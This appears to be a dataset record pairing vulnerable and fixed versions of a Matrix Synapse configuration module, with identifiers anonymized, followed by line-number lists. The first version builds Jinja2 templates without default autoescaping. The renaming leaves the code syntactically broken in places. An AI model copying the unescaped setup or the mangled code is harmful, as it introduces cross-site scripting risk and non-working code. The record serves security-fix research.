anonymized usage statistics from your homeserver. Only very basic aggregate
data (e.g. number of users) will be reported, but it helps us to track the
growth of the Matrix community, and helps us to make Matrix a success, as well
as to convince other networks that they should peer with us.
Thank you.
"""
VAR_2 = """\
Missing mandatory `VAR_31` config option.
"""
VAR_3 = """\
"""
def FUNC_0(VAR_4):
try:
os.stat(VAR_4)
return True
except OSError as e:
if e.errno != errno.ENOENT:
raise e
return False
class CLASS_1:
VAR_12 = None
def __init__(self, VAR_13=None):
self.root = VAR_13
self.default_template_dir = pkg_resources.resource_filename(
"synapse", "res/templates"
)
def __getattr__(self, VAR_14: str) -> Any:
if VAR_14 in ["generate_config_section", "read_config"]:
raise AttributeError(VAR_14)
if self.root is None:
raise AttributeError(VAR_14)
else:
return self.root._get_unclassed_config(self.section, VAR_14)
@staticmethod
def FUNC_5(VAR_5):
if isinstance(VAR_5, int):
return VAR_5
VAR_48 = {"K": 1024, "M": 1024 * 1024}
VAR_49 = 1
VAR_50 = VAR_5[-1]
if VAR_50 in VAR_48:
VAR_5 = VAR_5[:-1]
VAR_49 = VAR_48[VAR_50]
return int(VAR_5) * VAR_49
@staticmethod
def FUNC_6(VAR_5):
if isinstance(VAR_5, int):
return VAR_5
VAR_51 = 1000
VAR_52 = 60 * VAR_51
VAR_53 = 60 * VAR_52
VAR_54 = 24 * VAR_53
VAR_55 = 7 * VAR_54
VAR_56 = 365 * VAR_54
VAR_48 = {"s": VAR_51, "m": VAR_52, "h": VAR_53, "d": VAR_54, "w": VAR_55, "y": VAR_56}
VAR_49 = 1
VAR_50 = VAR_5[-1]
if VAR_50 in VAR_48:
VAR_5 = VAR_5[:-1]
VAR_49 = VAR_48[VAR_50]
return int(VAR_5) * VAR_49
@staticmethod
def FUNC_7(VAR_4):
return os.path.abspath(VAR_4) if VAR_4 else VAR_4
@classmethod
def FUNC_0(VAR_15, VAR_4):
return FUNC_0(VAR_4)
@classmethod
def FUNC_8(VAR_15, VAR_4, VAR_16):
if VAR_4 is None:
raise CLASS_0("Missing config for %s." % (VAR_16,))
try:
os.stat(VAR_4)
except OSError as e:
raise CLASS_0(
"Error accessing file '%s' (config for %s): %s"
% (VAR_4, VAR_16, e.strerror)
)
return VAR_15.abspath(VAR_4)
@classmethod
def FUNC_9(VAR_15, VAR_17):
dir_path = VAR_15.abspath(VAR_17)
try:
os.makedirs(VAR_17)
except OSError as e:
if e.errno != errno.EEXIST:
raise
if not os.path.isdir(VAR_17):
raise CLASS_0("%s is not a directory" % (VAR_17,))
return VAR_17
@classmethod
def FUNC_10(VAR_15, VAR_4, VAR_16):
VAR_15.check_file(VAR_4, VAR_16)
with open(VAR_4) as file_stream:
return file_stream.read()
def FUNC_11(
self,
VAR_18: List[str],
VAR_19: Optional[str] = None,
VAR_20: bool = False,
) -> List[jinja2.Template]:
VAR_57 = []
VAR_58 = [self.default_template_dir]
if VAR_19:
if not self.path_exists(VAR_19):
raise CLASS_0(
"Configured VAR_73 directory does not exist: %s"
% (VAR_19,)
)
VAR_58.insert(0, VAR_19)
VAR_59 = jinja2.FileSystemLoader(VAR_58)
VAR_60 = jinja2.Environment(VAR_59=loader, VAR_20=autoescape)
VAR_60.filters.update(
{
"format_ts": FUNC_1,
"mxc_to_http": FUNC_2(self.public_baseurl),
}
)
for filename in VAR_18:
VAR_73 = VAR_60.get_template(filename)
VAR_57.append(VAR_73)
return VAR_57
def FUNC_1(VAR_5: int, VAR_6: str):
return time.strftime(VAR_6, time.localtime(VAR_5 / 1000))
def FUNC_2(VAR_7: str) -> Callable:
def FUNC_12(VAR_5, VAR_21, VAR_22, VAR_23="crop"):
if VAR_5[0:6] != "mxc://":
return ""
VAR_61 = VAR_5[6:]
VAR_62 = None
if "#" in VAR_61:
server_and_media_id, VAR_62 = VAR_61.split("#", 1)
VAR_62 = "#" + VAR_62
VAR_63 = {"width": VAR_21, "height": VAR_22, "method": VAR_23}
return "%s_matrix/media/v1/thumbnail/%s?%s%s" % (
VAR_7,
VAR_61,
urllib.parse.urlencode(VAR_63),
VAR_62 or "",
)
return FUNC_12
class CLASS_2:
VAR_24 = []
def __init__(self):
self._configs = OrderedDict()
for VAR_74 in self.config_classes:
if VAR_74.section is None:
raise ValueError("%r requires a VAR_12 name" % (VAR_74,))
try:
VAR_78 = VAR_74(self)
except Exception as e:
raise Exception("Failed making %s: %r" % (VAR_74.section, e))
self._configs[VAR_74.section] = VAR_78
def __getattr__(self, VAR_14: str) -> Any:
if VAR_14 in self._configs.keys():
return self._configs[VAR_14]
return self._get_unclassed_config(None, VAR_14)
def FUNC_13(self, VAR_25: Optional[str], VAR_14: str):
for VAR_47, val in self._configs.items():
if VAR_47 == VAR_25:
continue
if VAR_14 in dir(val):
return getattr(val, VAR_14)
raise AttributeError(VAR_14, "not found in %s" % (list(self._configs.keys()),))
def FUNC_14(self, VAR_26: str, *VAR_27, **VAR_28) -> MutableMapping[str, Any]:
VAR_64 = OrderedDict()
for VAR_79, config in self._configs.items():
if hasattr(config, VAR_26):
VAR_64[VAR_79] = getattr(config, VAR_26)(*VAR_27, **VAR_28)
return VAR_64
@classmethod
def FUNC_15(VAR_15, VAR_26: str, *VAR_27, **VAR_28):
for config in VAR_15.config_classes:
if hasattr(config, VAR_26):
getattr(config, VAR_26)(*VAR_27, **VAR_28)
def FUNC_16(
self,
VAR_29,
VAR_30,
VAR_31,
VAR_32=False,
VAR_33=None,
VAR_34=False,
VAR_35=None,
VAR_36=None,
VAR_37=None,
VAR_38=None,
):
return VAR_3 + "\n\n".join(
dedent(VAR_78)
for VAR_78 in self.invoke_all(
"generate_config_section",
VAR_29=config_dir_path,
VAR_30=data_dir_path,
VAR_31=server_name,
VAR_32=generate_secrets,
VAR_33=report_stats,
VAR_34=open_private_ports,
VAR_35=listeners,
VAR_36=tls_certificate_path,
VAR_37=tls_private_key_path,
VAR_38=acme_domain,
).values()
)
@classmethod
def FUNC_17(VAR_15, VAR_39, VAR_40):
VAR_41 = argparse.ArgumentParser(VAR_39=description)
VAR_15.add_arguments_to_parser(VAR_41)
VAR_65, VAR_66 = VAR_15.load_config_with_parser(VAR_41, VAR_40)
return VAR_65
@classmethod
def FUNC_18(VAR_15, VAR_41):
VAR_41.add_argument(
"-c",
"--config-path",
action="append",
metavar="CONFIG_FILE",
help="Specify config file. Can be given multiple times and"
" may specify directories containing *.yaml VAR_81.",
)
VAR_41.add_argument(
"--keys-directory",
metavar="DIRECTORY",
help="Where VAR_81 such as certs and signing keys are stored when"
" their location is not given explicitly in the config."
" Defaults to the directory containing the last config file",
)
VAR_15.invoke_all_static("add_arguments", VAR_41)
@classmethod
def FUNC_19(VAR_15, VAR_42, VAR_40):
VAR_65 = VAR_15()
VAR_67 = VAR_42.parse_args(VAR_40)
VAR_8 = FUNC_4(VAR_9=VAR_67.config_path)
if not VAR_8:
VAR_42.error("Must supply a config file.")
if VAR_67.keys_directory:
VAR_29 = VAR_67.keys_directory
else:
VAR_29 = os.path.dirname(VAR_8[-1])
VAR_29 = os.path.abspath(VAR_29)
VAR_30 = os.getcwd()
VAR_43 = FUNC_3(VAR_8)
VAR_65.parse_config_dict(
VAR_43, VAR_29=config_dir_path, VAR_30=data_dir_path
)
VAR_65.invoke_all("read_arguments", VAR_67)
return VAR_65, VAR_67
@classmethod
def FUNC_20(VAR_15, VAR_39, VAR_40):
VAR_42 = argparse.ArgumentParser(VAR_39=description)
VAR_42.add_argument(
"-c",
"--config-path",
action="append",
metavar="CONFIG_FILE",
help="Specify config file. Can be given multiple times and"
" may specify directories containing *.yaml VAR_81.",
)
VAR_68 = VAR_42.add_argument_group("Config generation")
VAR_68.add_argument(
"--generate-config",
action="store_true",
help="Generate a config file, then exit.",
)
VAR_68.add_argument(
"--generate-missing-configs",
"--generate-keys",
action="store_true",
help="Generate any missing additional config VAR_81, then exit.",
)
VAR_68.add_argument(
"-H", "--server-name", help="The server VAR_79 to generate a config file for."
)
VAR_68.add_argument(
"--report-stats",
action="store",
help="Whether the generated config reports anonymized usage statistics.",
choices=["yes", "no"],
)
VAR_68.add_argument(
"--config-directory",
"--keys-directory",
metavar="DIRECTORY",
help=(
"Specify where additional config VAR_81 such as signing keys and log"
" config should be stored. Defaults to the same directory as the last"
" config file."
),
)
VAR_68.add_argument(
"--data-directory",
metavar="DIRECTORY",
help=(
"Specify where data such as the media store and database file should be"
" stored. Defaults to the current working directory."
),
)
VAR_68.add_argument(
"--open-private-ports",
action="store_true",
help=(
"Leave private ports (such as the non-TLS HTTP listener) open to the"
" internet. Do not use this unless you know what you are doing."
),
)
VAR_15.invoke_all_static("add_arguments", VAR_42)
VAR_67 = VAR_42.parse_args(VAR_40)
VAR_8 = FUNC_4(VAR_9=VAR_67.config_path)
if not VAR_8:
VAR_42.error(
"Must supply a config file.\nA config file can be automatically"
' generated using "--generate-config -H SERVER_NAME'
' -c CONFIG-FILE"'
)
if VAR_67.config_directory:
VAR_29 = VAR_67.config_directory
else:
VAR_29 = os.path.dirname(VAR_8[-1])
VAR_29 = os.path.abspath(VAR_29)
VAR_30 = os.getcwd()
VAR_69 = VAR_67.generate_missing_configs
VAR_65 = VAR_15()
if VAR_67.generate_config:
if VAR_67.report_stats is None:
VAR_42.error(
"Please specify either --report-stats=yes or --report-stats=no\n\n"
+ VAR_1
)
(VAR_75,) = VAR_8
if not FUNC_0(VAR_75):
print("Generating config file %s" % (VAR_75,))
if VAR_67.data_directory:
VAR_30 = VAR_67.data_directory
else:
VAR_30 = os.getcwd()
VAR_30 = os.path.abspath(VAR_30)
VAR_31 = VAR_67.server_name
if not VAR_31:
raise CLASS_0(
"Must specify a VAR_31 to a generate config for."
" Pass -H server.name."
)
VAR_80 = VAR_65.generate_config(
VAR_29=config_dir_path,
VAR_30=data_dir_path,
VAR_31=server_name,
VAR_33=(VAR_67.report_stats == "yes"),
VAR_32=True,
VAR_34=VAR_67.open_private_ports,
)
if not FUNC_0(VAR_29):
os.makedirs(VAR_29)
with open(VAR_75, "w") as config_file:
config_file.write(VAR_80)
config_file.write("\n\n# vim:ft=yaml")
VAR_43 = yaml.safe_load(VAR_80)
VAR_65.generate_missing_files(VAR_43, VAR_29)
print(
(
"A config file has been generated in %r for server name"
" %r. Please review this file and customise it"
" to your needs."
)
% (VAR_75, VAR_31)
)
return
else:
print(
(
"Config file %r already exists. Generating any missing config"
" VAR_81."
)
% (VAR_75,)
)
VAR_69 = True
VAR_43 = FUNC_3(VAR_8)
if VAR_69:
VAR_65.generate_missing_files(VAR_43, VAR_29)
return None
VAR_65.parse_config_dict(
VAR_43, VAR_29=config_dir_path, VAR_30=data_dir_path
)
VAR_65.invoke_all("read_arguments", VAR_67)
return VAR_65
def FUNC_21(self, VAR_43, VAR_29=None, VAR_30=None):
self.invoke_all(
"read_config",
VAR_43,
VAR_29=config_dir_path,
VAR_30=data_dir_path,
)
def FUNC_22(self, VAR_43, VAR_29):
self.invoke_all("generate_files", VAR_43, VAR_29)
def FUNC_3(VAR_8):
VAR_44 = {}
for config_file in VAR_8:
with open(config_file) as file_stream:
VAR_76 = yaml.safe_load(file_stream)
if not isinstance(VAR_76, dict):
VAR_77 = "File %r is empty or doesn't parse into a VAR_47-VAR_5 map. IGNORING."
print(VAR_77 % (config_file,))
continue
VAR_44.update(VAR_76)
if "server_name" not in VAR_44:
raise CLASS_0(VAR_2)
if "report_stats" not in VAR_44:
raise CLASS_0(
VAR_0 + "\n" + VAR_1
)
return VAR_44
def FUNC_4(VAR_9):
VAR_8 = []
if VAR_9:
for VAR_75 in VAR_9:
if os.path.isdir(VAR_75):
VAR_81 = []
for entry in os.listdir(VAR_75):
VAR_82 = os.path.join(VAR_75, entry)
if not os.path.isfile(VAR_82):
VAR_77 = "Found subdirectory in config directory: %r. IGNORING."
print(VAR_77 % (VAR_82,))
continue
if not entry.endswith(".yaml"):
VAR_77 = (
"Found file in config directory that does not end in "
"'.yaml': %r. IGNORING."
)
print(VAR_77 % (VAR_82,))
continue
VAR_81.append(VAR_82)
VAR_8.extend(sorted(VAR_81))
else:
VAR_8.append(VAR_75)
return VAR_8
@attr.s
class CLASS_3:
VAR_45 = attr.ib(type=List[str])
def FUNC_23(self, VAR_46: str, VAR_47: str) -> bool:
if not self.instances or len(self.instances) == 1:
return True
return self.get_instance(VAR_47) == VAR_46
def FUNC_24(self, VAR_47: str) -> str:
if not self.instances:
return "master"
if len(self.instances) == 1:
return self.instances[0]
VAR_70 = sha256(VAR_47.encode("utf8")).digest()
VAR_71 = int.from_bytes(VAR_70, byteorder="little")
VAR_72 = VAR_71 % (len(self.instances))
return self.instances[VAR_72]
__all__ = ["Config", "RootConfig", "ShardedWorkerHandlingConfig"]
|
import argparse
import .errno
import os
import time
import urllib.parse
from collections import OrderedDict
from hashlib import sha256
from textwrap import dedent
from typing import Any, Callable, Iterable, List, MutableMapping, Optional
import attr
import jinja2
import pkg_resources
import yaml
class CLASS_0(Exception):
def __init__(self, VAR_10: str, VAR_11: Optional[Iterable[str]] = None):
self.msg = VAR_10
self.path = VAR_11
VAR_0 = """\
Please opt in or out of reporting anonymized homeserver usage statistics, by
setting the `VAR_33` VAR_47 in your config file to either True or False.
"""
VAR_1 = """\
We would really appreciate it if you could help our project out by reporting
anonymized usage statistics from your homeserver. Only very basic aggregate
data (e.g. number of users) will be reported, but it helps us to track the
growth of the Matrix community, and helps us to make Matrix a success, as well
as to convince other networks that they should peer with us.
Thank you.
"""
VAR_2 = """\
Missing mandatory `VAR_31` config option.
"""
VAR_3 = """\
"""
def FUNC_0(VAR_4):
try:
os.stat(VAR_4)
return True
except OSError as e:
if e.errno != errno.ENOENT:
raise e
return False
class CLASS_1:
VAR_12 = None
def __init__(self, VAR_13=None):
self.root = VAR_13
self.default_template_dir = pkg_resources.resource_filename(
"synapse", "res/templates"
)
def __getattr__(self, VAR_14: str) -> Any:
if VAR_14 in ["generate_config_section", "read_config"]:
raise AttributeError(VAR_14)
if self.root is None:
raise AttributeError(VAR_14)
else:
return self.root._get_unclassed_config(self.section, VAR_14)
@staticmethod
def FUNC_5(VAR_5):
if isinstance(VAR_5, int):
return VAR_5
VAR_48 = {"K": 1024, "M": 1024 * 1024}
VAR_49 = 1
VAR_50 = VAR_5[-1]
if VAR_50 in VAR_48:
VAR_5 = VAR_5[:-1]
VAR_49 = VAR_48[VAR_50]
return int(VAR_5) * VAR_49
@staticmethod
def FUNC_6(VAR_5):
if isinstance(VAR_5, int):
return VAR_5
VAR_51 = 1000
VAR_52 = 60 * VAR_51
VAR_53 = 60 * VAR_52
VAR_54 = 24 * VAR_53
VAR_55 = 7 * VAR_54
VAR_56 = 365 * VAR_54
VAR_48 = {"s": VAR_51, "m": VAR_52, "h": VAR_53, "d": VAR_54, "w": VAR_55, "y": VAR_56}
VAR_49 = 1
VAR_50 = VAR_5[-1]
if VAR_50 in VAR_48:
VAR_5 = VAR_5[:-1]
VAR_49 = VAR_48[VAR_50]
return int(VAR_5) * VAR_49
@staticmethod
def FUNC_7(VAR_4):
return os.path.abspath(VAR_4) if VAR_4 else VAR_4
@classmethod
def FUNC_0(VAR_15, VAR_4):
return FUNC_0(VAR_4)
@classmethod
def FUNC_8(VAR_15, VAR_4, VAR_16):
if VAR_4 is None:
raise CLASS_0("Missing config for %s." % (VAR_16,))
try:
os.stat(VAR_4)
except OSError as e:
raise CLASS_0(
"Error accessing file '%s' (config for %s): %s"
% (VAR_4, VAR_16, e.strerror)
)
return VAR_15.abspath(VAR_4)
@classmethod
def FUNC_9(VAR_15, VAR_17):
dir_path = VAR_15.abspath(VAR_17)
try:
os.makedirs(VAR_17)
except OSError as e:
if e.errno != errno.EEXIST:
raise
if not os.path.isdir(VAR_17):
raise CLASS_0("%s is not a directory" % (VAR_17,))
return VAR_17
@classmethod
def FUNC_10(VAR_15, VAR_4, VAR_16):
VAR_15.check_file(VAR_4, VAR_16)
with open(VAR_4) as file_stream:
return file_stream.read()
def FUNC_11(self, VAR_18: str) -> jinja2.Template:
return self.read_templates([VAR_18])[0]
def FUNC_12(
self, VAR_19: List[str], VAR_20: Optional[str] = None,
) -> List[jinja2.Template]:
VAR_57 = [self.default_template_dir]
if VAR_20:
if not self.path_exists(VAR_20):
raise CLASS_0(
"Configured template directory does not exist: %s"
% (VAR_20,)
)
VAR_57.insert(0, VAR_20)
VAR_58 = jinja2.FileSystemLoader(VAR_57)
VAR_59 = jinja2.Environment(VAR_58=loader, autoescape=jinja2.select_autoescape(),)
VAR_59.filters.update(
{
"format_ts": FUNC_1,
"mxc_to_http": FUNC_2(self.public_baseurl),
}
)
return [VAR_59.get_template(VAR_18) for VAR_18 in VAR_19]
def FUNC_1(VAR_5: int, VAR_6: str):
return time.strftime(VAR_6, time.localtime(VAR_5 / 1000))
def FUNC_2(VAR_7: str) -> Callable:
def FUNC_13(VAR_5, VAR_21, VAR_22, VAR_23="crop"):
if VAR_5[0:6] != "mxc://":
return ""
VAR_60 = VAR_5[6:]
VAR_61 = None
if "#" in VAR_60:
server_and_media_id, VAR_61 = VAR_60.split("#", 1)
VAR_61 = "#" + VAR_61
VAR_62 = {"width": VAR_21, "height": VAR_22, "method": VAR_23}
return "%s_matrix/media/v1/thumbnail/%s?%s%s" % (
VAR_7,
VAR_60,
urllib.parse.urlencode(VAR_62),
VAR_61 or "",
)
return FUNC_13
class CLASS_2:
VAR_24 = []
def __init__(self):
self._configs = OrderedDict()
for VAR_72 in self.config_classes:
if VAR_72.section is None:
raise ValueError("%r requires a VAR_12 name" % (VAR_72,))
try:
VAR_76 = VAR_72(self)
except Exception as e:
raise Exception("Failed making %s: %r" % (VAR_72.section, e))
self._configs[VAR_72.section] = VAR_76
def __getattr__(self, VAR_14: str) -> Any:
if VAR_14 in self._configs.keys():
return self._configs[VAR_14]
return self._get_unclassed_config(None, VAR_14)
def FUNC_14(self, VAR_25: Optional[str], VAR_14: str):
for VAR_47, val in self._configs.items():
if VAR_47 == VAR_25:
continue
if VAR_14 in dir(val):
return getattr(val, VAR_14)
raise AttributeError(VAR_14, "not found in %s" % (list(self._configs.keys()),))
def FUNC_15(self, VAR_26: str, *VAR_27, **VAR_28) -> MutableMapping[str, Any]:
VAR_63 = OrderedDict()
for VAR_77, config in self._configs.items():
if hasattr(config, VAR_26):
VAR_63[VAR_77] = getattr(config, VAR_26)(*VAR_27, **VAR_28)
return VAR_63
@classmethod
def FUNC_16(VAR_15, VAR_26: str, *VAR_27, **VAR_28):
for config in VAR_15.config_classes:
if hasattr(config, VAR_26):
getattr(config, VAR_26)(*VAR_27, **VAR_28)
def FUNC_17(
self,
VAR_29,
VAR_30,
VAR_31,
VAR_32=False,
VAR_33=None,
VAR_34=False,
VAR_35=None,
VAR_36=None,
VAR_37=None,
VAR_38=None,
):
return VAR_3 + "\n\n".join(
dedent(VAR_76)
for VAR_76 in self.invoke_all(
"generate_config_section",
VAR_29=config_dir_path,
VAR_30=data_dir_path,
VAR_31=server_name,
VAR_32=generate_secrets,
VAR_33=report_stats,
VAR_34=open_private_ports,
VAR_35=listeners,
VAR_36=tls_certificate_path,
VAR_37=tls_private_key_path,
VAR_38=acme_domain,
).values()
)
@classmethod
def FUNC_18(VAR_15, VAR_39, VAR_40):
VAR_41 = argparse.ArgumentParser(VAR_39=description)
VAR_15.add_arguments_to_parser(VAR_41)
VAR_64, VAR_65 = VAR_15.load_config_with_parser(VAR_41, VAR_40)
return VAR_64
@classmethod
def FUNC_19(VAR_15, VAR_41):
VAR_41.add_argument(
"-c",
"--config-path",
action="append",
metavar="CONFIG_FILE",
help="Specify config file. Can be given multiple times and"
" may specify directories containing *.yaml VAR_79.",
)
VAR_41.add_argument(
"--keys-directory",
metavar="DIRECTORY",
help="Where VAR_79 such as certs and signing keys are stored when"
" their location is not given explicitly in the config."
" Defaults to the directory containing the last config file",
)
VAR_15.invoke_all_static("add_arguments", VAR_41)
@classmethod
def FUNC_20(VAR_15, VAR_42, VAR_40):
VAR_64 = VAR_15()
VAR_66 = VAR_42.parse_args(VAR_40)
VAR_8 = FUNC_4(VAR_9=VAR_66.config_path)
if not VAR_8:
VAR_42.error("Must supply a config file.")
if VAR_66.keys_directory:
VAR_29 = VAR_66.keys_directory
else:
VAR_29 = os.path.dirname(VAR_8[-1])
VAR_29 = os.path.abspath(VAR_29)
VAR_30 = os.getcwd()
VAR_43 = FUNC_3(VAR_8)
VAR_64.parse_config_dict(
VAR_43, VAR_29=config_dir_path, VAR_30=data_dir_path
)
VAR_64.invoke_all("read_arguments", VAR_66)
return VAR_64, VAR_66
@classmethod
def FUNC_21(VAR_15, VAR_39, VAR_40):
VAR_42 = argparse.ArgumentParser(VAR_39=description)
VAR_42.add_argument(
"-c",
"--config-path",
action="append",
metavar="CONFIG_FILE",
help="Specify config file. Can be given multiple times and"
" may specify directories containing *.yaml VAR_79.",
)
VAR_67 = VAR_42.add_argument_group("Config generation")
VAR_67.add_argument(
"--generate-config",
action="store_true",
help="Generate a config file, then exit.",
)
VAR_67.add_argument(
"--generate-missing-configs",
"--generate-keys",
action="store_true",
help="Generate any missing additional config VAR_79, then exit.",
)
VAR_67.add_argument(
"-H", "--server-name", help="The server VAR_77 to generate a config file for."
)
VAR_67.add_argument(
"--report-stats",
action="store",
help="Whether the generated config reports anonymized usage statistics.",
choices=["yes", "no"],
)
VAR_67.add_argument(
"--config-directory",
"--keys-directory",
metavar="DIRECTORY",
help=(
"Specify where additional config VAR_79 such as signing keys and log"
" config should be stored. Defaults to the same directory as the last"
" config file."
),
)
VAR_67.add_argument(
"--data-directory",
metavar="DIRECTORY",
help=(
"Specify where data such as the media store and database file should be"
" stored. Defaults to the current working directory."
),
)
VAR_67.add_argument(
"--open-private-ports",
action="store_true",
help=(
"Leave private ports (such as the non-TLS HTTP listener) open to the"
" internet. Do not use this unless you know what you are doing."
),
)
VAR_15.invoke_all_static("add_arguments", VAR_42)
VAR_66 = VAR_42.parse_args(VAR_40)
VAR_8 = FUNC_4(VAR_9=VAR_66.config_path)
if not VAR_8:
VAR_42.error(
"Must supply a config file.\nA config file can be automatically"
' generated using "--generate-config -H SERVER_NAME'
' -c CONFIG-FILE"'
)
if VAR_66.config_directory:
VAR_29 = VAR_66.config_directory
else:
VAR_29 = os.path.dirname(VAR_8[-1])
VAR_29 = os.path.abspath(VAR_29)
VAR_30 = os.getcwd()
VAR_68 = VAR_66.generate_missing_configs
VAR_64 = VAR_15()
if VAR_66.generate_config:
if VAR_66.report_stats is None:
VAR_42.error(
"Please specify either --report-stats=yes or --report-stats=no\n\n"
+ VAR_1
)
(VAR_73,) = VAR_8
if not FUNC_0(VAR_73):
print("Generating config file %s" % (VAR_73,))
if VAR_66.data_directory:
VAR_30 = VAR_66.data_directory
else:
VAR_30 = os.getcwd()
VAR_30 = os.path.abspath(VAR_30)
VAR_31 = VAR_66.server_name
if not VAR_31:
raise CLASS_0(
"Must specify a VAR_31 to a generate config for."
" Pass -H server.name."
)
VAR_78 = VAR_64.generate_config(
VAR_29=config_dir_path,
VAR_30=data_dir_path,
VAR_31=server_name,
VAR_33=(VAR_66.report_stats == "yes"),
VAR_32=True,
VAR_34=VAR_66.open_private_ports,
)
if not FUNC_0(VAR_29):
os.makedirs(VAR_29)
with open(VAR_73, "w") as config_file:
config_file.write(VAR_78)
config_file.write("\n\n# vim:ft=yaml")
VAR_43 = yaml.safe_load(VAR_78)
VAR_64.generate_missing_files(VAR_43, VAR_29)
print(
(
"A config file has been generated in %r for server name"
" %r. Please review this file and customise it"
" to your needs."
)
% (VAR_73, VAR_31)
)
return
else:
print(
(
"Config file %r already exists. Generating any missing config"
" VAR_79."
)
% (VAR_73,)
)
VAR_68 = True
VAR_43 = FUNC_3(VAR_8)
if VAR_68:
VAR_64.generate_missing_files(VAR_43, VAR_29)
return None
VAR_64.parse_config_dict(
VAR_43, VAR_29=config_dir_path, VAR_30=data_dir_path
)
VAR_64.invoke_all("read_arguments", VAR_66)
return VAR_64
def FUNC_22(self, VAR_43, VAR_29=None, VAR_30=None):
self.invoke_all(
"read_config",
VAR_43,
VAR_29=config_dir_path,
VAR_30=data_dir_path,
)
def FUNC_23(self, VAR_43, VAR_29):
self.invoke_all("generate_files", VAR_43, VAR_29)
def FUNC_3(VAR_8):
VAR_44 = {}
for config_file in VAR_8:
with open(config_file) as file_stream:
VAR_74 = yaml.safe_load(file_stream)
if not isinstance(VAR_74, dict):
VAR_75 = "File %r is empty or doesn't parse into a VAR_47-VAR_5 map. IGNORING."
print(VAR_75 % (config_file,))
continue
VAR_44.update(VAR_74)
if "server_name" not in VAR_44:
raise CLASS_0(VAR_2)
if "report_stats" not in VAR_44:
raise CLASS_0(
VAR_0 + "\n" + VAR_1
)
return VAR_44
def FUNC_4(VAR_9):
VAR_8 = []
if VAR_9:
for VAR_73 in VAR_9:
if os.path.isdir(VAR_73):
VAR_79 = []
for entry in os.listdir(VAR_73):
VAR_80 = os.path.join(VAR_73, entry)
if not os.path.isfile(VAR_80):
VAR_75 = "Found subdirectory in config directory: %r. IGNORING."
print(VAR_75 % (VAR_80,))
continue
if not entry.endswith(".yaml"):
VAR_75 = (
"Found file in config directory that does not end in "
"'.yaml': %r. IGNORING."
)
print(VAR_75 % (VAR_80,))
continue
VAR_79.append(VAR_80)
VAR_8.extend(sorted(VAR_79))
else:
VAR_8.append(VAR_73)
return VAR_8
@attr.s
class CLASS_3:
VAR_45 = attr.ib(type=List[str])
def FUNC_24(self, VAR_46: str, VAR_47: str) -> bool:
if not self.instances or len(self.instances) == 1:
return True
return self.get_instance(VAR_47) == VAR_46
def FUNC_25(self, VAR_47: str) -> str:
if not self.instances:
return "master"
if len(self.instances) == 1:
return self.instances[0]
VAR_69 = sha256(VAR_47.encode("utf8")).digest()
VAR_70 = int.from_bytes(VAR_69, byteorder="little")
VAR_71 = VAR_70 % (len(self.instances))
return self.instances[VAR_71]
__all__ = ["Config", "RootConfig", "ShardedWorkerHandlingConfig"]
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
27,
32,
33,
36,
42,
46,
47,
48,
49,
54,
61,
64,
68,
69,
71,
72,
73,
74,
75,
76,
77,
78,
80,
81,
84,
88,
99,
100,
104,
111,
113,
116,
117,
121,
125,
131,
136,
148,
166,
170,
174,
187,
199,
205,
213,
217,
219,
222,
225,
228,
231,
237,
238,
239,
241,
247,
248,
250,
253,
254,
261,
263,
266,
268,
269,
272,
273,
276,
280,
284,
290,
298,
300,
301,
305,
312,
314,
317,
321,
327,
337,
339,
344,
349,
357,
360,
362,
367,
377,
381,
383,
389,
401,
417,
420,
424,
427,
430,
434,
437,
440,
456,
457,
460,
462,
464,
467,
471,
488,
492,
494,
500,
502,
506,
508,
510,
514,
523,
531,
533,
537,
539,
541,
545,
551,
553,
555,
557,
560,
567,
572,
574,
576,
580,
582,
594,
642,
645,
647,
654,
661,
663,
665,
672,
676,
682,
689,
698,
704,
707,
726,
731,
736,
738,
741,
744,
747,
757,
760,
761,
764,
767,
774,
779,
781,
784,
790,
791,
797,
800,
804,
809,
810,
811,
819,
827,
829,
834,
835,
840,
845,
847,
851,
854,
856,
859,
864,
867,
870,
871,
872,
873,
874,
875,
876,
881,
882,
884,
35,
36,
37,
38,
39,
40,
41,
83,
84,
85,
86,
87,
88,
89,
90,
91,
102,
103,
104,
105,
106,
107,
108,
109,
110,
275,
276,
277,
278,
279,
303,
304,
305,
306,
307,
308,
309,
310,
311,
763,
764,
765,
766,
767,
768,
769,
793,
794,
795,
796,
797,
798,
799,
800,
801,
802,
803,
838,
839,
840,
841,
842,
843,
844,
123,
124,
125,
126,
127,
128,
212,
213,
214,
215,
216,
217,
218,
219,
220,
221,
222,
223,
224,
225,
226,
227,
228,
229,
230,
231,
232,
233,
234,
329,
330,
331,
332,
333,
334,
341,
342,
343,
344,
345,
346,
347,
348,
349,
350,
351,
352,
353,
364,
365,
366,
367,
368,
369,
370,
371,
372,
373,
374,
375,
386,
387,
388,
389,
390,
391,
392,
393,
394,
395,
396,
397,
415,
416,
417,
418,
419,
420,
421,
422,
423,
424,
425,
426,
427,
428,
429,
430,
431,
432,
433,
434,
435,
436,
437,
438,
439,
440,
441,
442,
443,
444,
445,
446,
447,
448,
449,
450,
451,
452,
453,
454,
455,
456,
457,
458,
459,
460,
461,
462,
463,
464,
465,
466,
467,
468,
469,
470,
491,
492,
493,
494,
495,
496,
505,
506,
507,
508,
509,
510,
511,
512,
513,
536,
537,
538,
539,
540,
541,
542,
543,
544,
545,
546,
547,
548,
549,
550,
579,
580,
581,
582,
583,
584,
740,
741,
742,
743,
744,
745,
746,
747,
748,
749,
750,
849,
850,
858,
859,
860,
861,
862,
863
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
27,
32,
33,
36,
42,
46,
47,
48,
49,
54,
61,
64,
68,
69,
71,
72,
73,
74,
75,
76,
77,
78,
80,
81,
84,
88,
99,
100,
104,
111,
113,
116,
117,
121,
125,
131,
136,
148,
166,
170,
174,
187,
199,
205,
208,
211,
214,
217,
220,
225,
230,
234,
237,
240,
243,
246,
251,
252,
253,
255,
261,
262,
264,
267,
268,
275,
276,
278,
279,
282,
283,
286,
290,
294,
300,
308,
310,
311,
315,
322,
324,
327,
331,
337,
347,
349,
354,
359,
367,
370,
372,
377,
387,
391,
393,
399,
411,
427,
430,
434,
437,
440,
444,
447,
450,
466,
467,
470,
472,
474,
477,
481,
498,
502,
504,
510,
512,
516,
518,
520,
524,
533,
541,
543,
547,
549,
551,
555,
561,
563,
565,
567,
570,
577,
582,
584,
586,
590,
592,
604,
652,
655,
657,
664,
671,
673,
675,
682,
686,
692,
699,
708,
714,
717,
736,
741,
746,
748,
751,
754,
757,
767,
770,
771,
774,
777,
